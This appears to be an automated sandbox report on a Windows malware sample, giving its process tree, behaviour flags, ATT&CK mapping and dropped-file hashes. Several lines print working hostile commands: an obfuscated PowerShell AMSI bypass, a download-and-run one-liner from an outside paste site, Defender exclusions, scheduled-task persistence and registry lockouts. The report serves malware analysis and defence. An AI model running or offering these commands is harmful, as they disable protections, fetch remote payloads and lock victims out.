C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nOUHvjpwCLaA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xKWGpAHnPpDPJX,[Parameter(Position=1)][Type]$fVijlDocpz)$tHwiwnwGiLs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'fl'+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+'ega'+'t'+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+'n'+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+[Char](65)+'ut'+'o'+'Cl'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$tHwiwnwGiLs.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+[Char](108)+'N'+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+''+[Char](105)+''+'g'+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xKWGpAHnPpDPJX).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+'n'+'a'+''+'g'+''+[Char](101)+''+'d'+'');$tHwiwnwGiLs.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+'o'+''+[Char](116)+','+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l',$fVijlDocpz,$xKWGpAHnPpDPJX).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $tHwiwnwGiLs.CreateType();}$wdvbsEqnfZfOE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+'em'+'.'+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+'in3'+[Char](50)+''+'.'+''+'U'+'n'+[Char](115)+''+'a'+'f'+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+'o'+''+[Char](100)+''+'s'+'');$WQiXOKPKvnwzwF=$wdvbsEqnfZfOE.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+'r'+''+[Char](111)+'c'+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JCkYAQFDTgKZIanNLOK=nOUHvjpwCLaA @([String])([IntPtr]);$WWAwWftYiFkhPsxUfSpFqX=nOUHvjpwCLaA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lwIBMGIyuce=$wdvbsEqnfZfOE.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+'n'+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HuWkLmyHuVOsqB=$WQiXOKPKvnwzwF.Invoke($Null,@([Object]$lwIBMGIyuce,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'dL'+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$qweiyRkgVzmZBxeQb=$WQiXOKPKvnwzwF.Invoke($Null,@([Object]$lwIBMGIyuce,[Object](''+'V'+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$rDJugKJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HuWkLmyHuVOsqB,$JCkYAQFDTgKZIanNLOK).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+'l'+'');$eaQtIcjNKorRcuwrF=$WQiXOKPKvnwzwF.Invoke($Null,@([Object]$rDJugKJ,[Object]('Ams'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$SRtFPvsteO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qweiyRkgVzmZBxeQb,$WWAwWftYiFkhPsxUfSpFqX).Invoke($eaQtIcjNKorRcuwrF,[uint32]8,4,[ref]$SRtFPvsteO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eaQtIcjNKorRcuwrF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qweiyRkgVzmZBxeQb,$WWAwWftYiFkhPsxUfSpFqX).Invoke($eaQtIcjNKorRcuwrF,[uint32]8,0x20,[ref]$SRtFPvsteO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+'T'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+'4'+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484

C:\Users\Admin\AppData\Roaming\x4svchost.exe
C:\Users\Admin\AppData\Roaming\x4svchost.exe
2⤵
- Executes dropped EXE
PID:4248

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1148

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1240

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1308

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1404

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2960

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1572

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1780

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1852

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1960

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:620

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2232

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2240

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2284

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2436

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2780

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2968

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3020

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3164

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3308

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"
2⤵
PID:5076

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1260

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of FindShellTrayWindow
PID:1796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell "irm rentry.co/kayann1/raw | iex"
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:908

C:\Windows\svchost32.exe
"C:\Windows\svchost32.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4600

C:\Users\Admin\AppData\Local\Temp\x4.exe
"C:\Users\Admin\AppData\Local\Temp\x4.exe"
5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\x4.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
PID:3064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4svchost.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2312

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4svchost.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
PID:4928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5064

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4svchost" /tr "C:\Users\Admin\AppData\Roaming\x4svchost.exe"
6⤵
- Creates scheduled task(s)
PID:3304

C:\Users\Admin\AppData\Local\Temp\vwnhtd.exe
"C:\Users\Admin\AppData\Local\Temp\vwnhtd.exe"
6⤵
- Executes dropped EXE
PID:3288

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B28D.tmp\TrollSec.cmd""
7⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
8⤵
- Modifies registry key
PID:4568

C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
8⤵
- Modifies registry key
PID:364

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
8⤵
- Modifies registry key
PID:2984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
8⤵
- Modifies registry key
PID:1748

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
8⤵
- Modifies registry key
PID:1548

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\skulls.bmp /f
8⤵
- Sets desktop wallpaper using registry
PID:1360

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:2212

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:1420

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:3060

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:5092

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:4144

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:4968

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:2672

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:1824

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:4904

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:4340

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:612

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:2428

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:2176

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:2072

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
8⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
5⤵
- Executes dropped EXE
PID:2864

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3856

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4068

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4736

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4720

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:2120

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4204

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:3792

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:3044

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4032

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1740

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:1176

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1744

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
2c64aa22536612920da5641216f191f8

SHA1
debe1b1206f3f61f39df0a0926f939c1b912ef82

SHA256
5e94bb78213ae5e7c4c84af6f4502a9c3b37c6eac26ca846fe474349149e2b22

SHA512
7f01f5c2bd13faecd1992fcad6fccf04dd67946687881e33e502fea33bdcf70da7042867ec216fc7c83bd43d6b17ccf16e9a72f336c1977732444afd4920d2b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f1a25b9bd830afc5ac6ae707af37e4ff

SHA1
d5cc3bbe20a8c6fc0fe40c612e523d7abaf1160a

SHA256
3fedf112f8b907e24888ecef35712ec1b3493411f865b8e4b8347021421cc31b

SHA512
c3976b9a8a1650d2002b76ce2e2286b13f128df183e20140cdc2db067bf34bb79efbb6c4d38c3040f780aa36cd105cd7f49dc38d3a9e798a32b93a2daabbb9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f9f2507806aba980a5b3f58a80ec336f

SHA1
be66794ece6bddf352a4d201a965196e63674f4a

SHA256
8bfd01e7dc9e37f4b5be4ce43e0f38c80ff3da4dbc4f65418c5146908a726797

SHA512
4667630e028c33c0804a5766833c59854775cfef71081128f48251647df3ea8878bf4f66e8833f28318a4a9edf1fbb9ef76cd465b15a63ee88237f7f2b31548f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1e104e5651e115a6431886bfdbf64e00

SHA1
96cfd7941b3972a8144ceca466758f25f606385d

SHA256
86bd7d31166dd609b149ba75b0ddad385a0b0061037f1d22f94ad8fb164e4511

SHA512
f4994a93749832a14d49dc836d5e71e66a9d6b06337f3c7d0ffc5af42366e742834942feee4f6db49bc099c261b730c5aae169880e163e92f545a40bf7e173b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a5f62e1ee0fe9a1b7ec7debc4fcfb897

SHA1
c49bbd88b23cffa665f8e8eb83a3241a246298a8

SHA256
32c5724489f84bccb084428bd02b63f6b7b6ef81ca9be517ce4325770e4148bb

SHA512
896ac7e7ce703243759a24a848e65f6c05d8c9c7c1499f9a082a0d538f5bd29828a5ec24415982414db1b1f93610480c6cb018b3b7b138afef9c35cfcb3d0c08

Download Submit
C:\Users\Admin\AppData\Local\Temp\B28D.tmp\TrollSec.cmd
Filesize
3KB

MD5
591b8f958250ffc1b54a5a0f910aecd0

SHA1
eadcb249521116d4307992b96c3e67fff11bd821

SHA256
052fb4eadb9a2a494f2c94ae307e425cb53e9b6b8c9d35af218ce088181dd08f

SHA512
809257a2bcfcc0ace4284ca07c038392928a6ef928c4c1ba858926b93333d447772fa248fd72fba0497603e907e54de180ca7b034bfdb11319a481808c4fb890

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1zzjruo.u4x.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\vwnhtd.exe
Filesize
593KB

MD5
0888788f77f9292ae567d967d6fec089

SHA1
854599eac2c211dc92b83ef22830d773e5d14067

SHA256
13257f2173f55702469eb70b7b1328b788ba8d75ce1da5ce34d83ad3e1699e38

SHA512
c1835093e717724371e2bd9b0d2180e74ee54bd5710611b7420b2244b9f784038915ed9140739cc2e1632ec6f13b6c448a99804625c48d5bee83a6e7db367486

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4.exe
Filesize
65KB

MD5
706dee82cdb57e80f2ce780a5798e6fe

SHA1
852b60829d51e13235a16588b8819c606707afe9

SHA256
15120c9566eae8e4938a624e08f5dbfc3db6b5a5155f924c977ea5c2886f76e7

SHA512
2fa75a3b071dfc70fe8b643f9b7714b3d2167c5d37093762496faa9846e1b01d8ebcfc7466c708dc36e90b3b261f5f57e90e6dc99c53e4c1f98f6aa5598d40f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
Filesize
164KB

MD5
8a7bee2c8cec6ac50bc42fe03d3231e6

SHA1
ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d

SHA256
c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8

SHA512
34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

Download Submit
C:\Users\Admin\Desktop\xxxxxxxxxxxxx.txt
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\skulls.bmp
Filesize
147KB

MD5
759fc7d13778a84f9469f89accb56812

SHA1
f68eddfbf2243e223de7864c32cdb94825847e04

SHA256
e568707301b278ac0af9e2887ba21ac801d3681df7f32b00c0dc66afcd37ea59

SHA512
60f807f4e151b7717cec1de4b59b3dad0e64b31545e8913e96fa3a7d43b87070ad780cb5464069a989ae7b77130a99a2ec4c922d524559681206f9b4a449637c

Download Submit
C:\Windows\svchost32.exe
Filesize
204KB

MD5
9528842e31920c14e0a8d4396291ea91

SHA1
6d05fe7c63c8823ea64a5f80e6a6781a3a996139

SHA256
0fe56125454ebc052d302f33332caed0acf39c23bb3eacbfa36c6c4752dab61b

SHA512
3d9912ab0d41254869ed1e32244b463d9984dad7ab40ae4d093ba8021b643b0c16787e003eac3ca1af28352ea662feef4c215cd6d5414e4ffec24b2d0fd6b15f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize
338B

MD5
63924df898e170d189a9ed3a8f1220b3

SHA1
e8132b105ef205fa004e493ca8d1254a41e3ac40

SHA256
151be4a8e215b700bca8b70f1f1b55ae9b5b72d868b6339f01029ec7c8d9760f

SHA512
0e1f8ae9c58a3fe7f73e38b756fcdaec83af8df9205afffae2cfe0885bb49849ff1aac00d1940ccc64b32be37a9ff6b817770d7d7f83e21838d0d3329aa6cac7

Download Submit
memory/396-99-0x00007FFF12460000-0x00007FFF1250E000-memory.dmp

Filesize
696KB

Download
memory/396-100-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/396-98-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp

Filesize
1.9MB

Download
memory/396-92-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/396-94-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/396-91-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/396-90-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/396-89-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/580-113-0x0000020BF2FE0000-0x0000020BF300C000-memory.dmp

Filesize
176KB

Download
memory/580-114-0x00007FFED4EF0000-0x00007FFED4F00000-memory.dmp

Filesize
64KB

Download
memory/580-104-0x0000020BF2FE0000-0x0000020BF300C000-memory.dmp

Filesize
176KB

Download
memory/580-103-0x0000020BF2FB0000-0x0000020BF2FD6000-memory.dmp

Filesize
152KB

Download
memory/580-107-0x0000020BF2FE0000-0x0000020BF300C000-memory.dmp

Filesize
176KB

Download
memory/632-123-0x00007FFED4EF0000-0x00007FFED4F00000-memory.dmp

Filesize
64KB

Download
memory/632-122-0x0000029659CA0000-0x0000029659CCC000-memory.dmp

Filesize
176KB

Download
